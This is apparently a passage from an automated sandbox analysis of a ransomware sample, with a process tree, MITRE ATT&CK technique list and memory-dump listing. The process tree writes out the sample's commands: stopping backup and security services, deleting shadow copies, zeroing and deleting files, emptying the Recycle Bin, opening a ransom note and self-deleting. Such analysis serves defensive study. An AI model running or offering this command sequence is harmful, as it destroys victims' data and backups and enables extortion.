- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:5104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5636
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5928
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:6000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:4952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:5280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5280
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:4228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:5576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:4040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5692
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5564
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4248
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5508
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5288
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:5560
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:6136
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5036
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6128
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5616
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2188
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4400
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4772
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4840
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5472
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4872
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5656
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4944
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5772
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5704
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6032
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5060
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:4700
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5712
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2064
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:4164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
  2⤵
  PID:4696
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:6000

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/644-114-0x0000000000050000-0x0000000000051000-memory.dmp

Filesize
4KB

Download
memory/644-116-0x000000001AD70000-0x000000001AD72000-memory.dmp

Filesize
8KB

Download
memory/992-293-0x0000027FF63A8000-0x0000027FF63A9000-memory.dmp

Filesize
4KB

Download
memory/992-279-0x0000027FF63A6000-0x0000027FF63A8000-memory.dmp

Filesize
8KB

Download
memory/992-210-0x0000027FF63A3000-0x0000027FF63A5000-memory.dmp

Filesize
8KB

Download
memory/992-209-0x0000027FF63A0000-0x0000027FF63A2000-memory.dmp

Filesize
8KB

Download
memory/1784-192-0x00000233C9FF0000-0x00000233C9FF2000-memory.dmp

Filesize
8KB

Download
memory/1784-267-0x00000233C9FF6000-0x00000233C9FF8000-memory.dmp

Filesize
8KB

Download
memory/1784-207-0x00000233C9FF3000-0x00000233C9FF5000-memory.dmp

Filesize
8KB

Download
memory/1784-289-0x00000233C9FF8000-0x00000233C9FF9000-memory.dmp

Filesize
4KB

Download
memory/1896-265-0x0000015E36FF6000-0x0000015E36FF8000-memory.dmp

Filesize
8KB

Download
memory/1896-287-0x0000015E36FF8000-0x0000015E36FF9000-memory.dmp

Filesize
4KB

Download
memory/1896-208-0x0000015E36FF3000-0x0000015E36FF5000-memory.dmp

Filesize
8KB

Download
memory/1896-183-0x0000015E36FF0000-0x0000015E36FF2000-memory.dmp

Filesize
8KB

Download
memory/1916-242-0x0000013FE2BB6000-0x0000013FE2BB8000-memory.dmp

Filesize
8KB

Download
memory/1916-284-0x0000013FE2BB8000-0x0000013FE2BB9000-memory.dmp

Filesize
4KB

Download
memory/1916-190-0x0000013FE2BB3000-0x0000013FE2BB5000-memory.dmp

Filesize
8KB

Download
memory/1916-188-0x0000013FE2BB0000-0x0000013FE2BB2000-memory.dmp

Filesize
8KB

Download
memory/2024-130-0x000001AF248E3000-0x000001AF248E5000-memory.dmp

Filesize
8KB

Download
memory/2024-123-0x000001AF24AF0000-0x000001AF24AF1000-memory.dmp

Filesize
4KB

Download
memory/2024-128-0x000001AF3F160000-0x000001AF3F161000-memory.dmp

Filesize
4KB

Download
memory/2024-129-0x000001AF248E0000-0x000001AF248E2000-memory.dmp

Filesize
8KB

Download
memory/2024-133-0x000001AF248E6000-0x000001AF248E8000-memory.dmp

Filesize
8KB

Download
memory/2076-278-0x000002435B166000-0x000002435B168000-memory.dmp

Filesize
8KB

Download
memory/2076-203-0x000002435B163000-0x000002435B165000-memory.dmp

Filesize
8KB

Download
memory/2076-205-0x000002435B160000-0x000002435B162000-memory.dmp

Filesize
8KB

Download
memory/2076-292-0x000002435B168000-0x000002435B169000-memory.dmp

Filesize
4KB

Download
memory/2208-199-0x0000017CFBCD3000-0x0000017CFBCD5000-memory.dmp

Filesize
8KB

Download
memory/2208-290-0x0000017CFBCD8000-0x0000017CFBCD9000-memory.dmp

Filesize
4KB

Download
memory/2208-195-0x0000017CFBCD0000-0x0000017CFBCD2000-memory.dmp

Filesize
8KB

Download
memory/2208-277-0x0000017CFBCD6000-0x0000017CFBCD8000-memory.dmp

Filesize
8KB

Download
memory/2212-201-0x00000265622A0000-0x00000265622A2000-memory.dmp

Filesize
8KB

Download
memory/2212-232-0x00000265622A6000-0x00000265622A8000-memory.dmp

Filesize
8KB

Download
memory/2212-202-0x00000265622A3000-0x00000265622A5000-memory.dmp

Filesize
8KB

Download
memory/2212-283-0x00000265622A8000-0x00000265622A9000-memory.dmp

Filesize
4KB

Download
memory/3868-186-0x0000018BF7B53000-0x0000018BF7B55000-memory.dmp

Filesize
8KB

Download
memory/3868-286-0x0000018BF7B58000-0x0000018BF7B59000-memory.dmp

Filesize
4KB

Download
memory/3868-181-0x0000018BF7B50000-0x0000018BF7B52000-memory.dmp

Filesize
8KB

Download
memory/3868-262-0x0000018BF7B56000-0x0000018BF7B58000-memory.dmp

Filesize
8KB

Download
memory/4184-294-0x0000019105358000-0x0000019105359000-memory.dmp

Filesize
4KB

Download
memory/4184-280-0x0000019105356000-0x0000019105358000-memory.dmp

Filesize
8KB

Download
memory/4184-219-0x0000019105350000-0x0000019105352000-memory.dmp

Filesize
8KB

Download
memory/4184-221-0x0000019105353000-0x0000019105355000-memory.dmp

Filesize
8KB

Download
memory/4324-295-0x0000012B21738000-0x0000012B21739000-memory.dmp

Filesize
4KB

Download
memory/4324-223-0x0000012B21730000-0x0000012B21732000-memory.dmp

Filesize
8KB

Download
memory/4324-281-0x0000012B21736000-0x0000012B21738000-memory.dmp

Filesize
8KB

Download
memory/4324-225-0x0000012B21733000-0x0000012B21735000-memory.dmp

Filesize
8KB

Download
memory/4484-285-0x000001C98DD46000-0x000001C98DD48000-memory.dmp

Filesize
8KB

Download
memory/4484-297-0x000001C98DD48000-0x000001C98DD49000-memory.dmp

Filesize
4KB

Download
memory/4484-227-0x000001C98DD40000-0x000001C98DD42000-memory.dmp

Filesize
8KB

Download
memory/4484-230-0x000001C98DD43000-0x000001C98DD45000-memory.dmp

Filesize
8KB

Download
memory/4640-238-0x00000299BDDF3000-0x00000299BDDF5000-memory.dmp

Filesize
8KB

Download
memory/4640-282-0x00000299BDDF6000-0x00000299BDDF8000-memory.dmp

Filesize
8KB

Download
memory/4640-236-0x00000299BDDF0000-0x00000299BDDF2000-memory.dmp

Filesize
8KB

Download
memory/4640-296-0x00000299BDDF8000-0x00000299BDDF9000-memory.dmp

Filesize
4KB

Download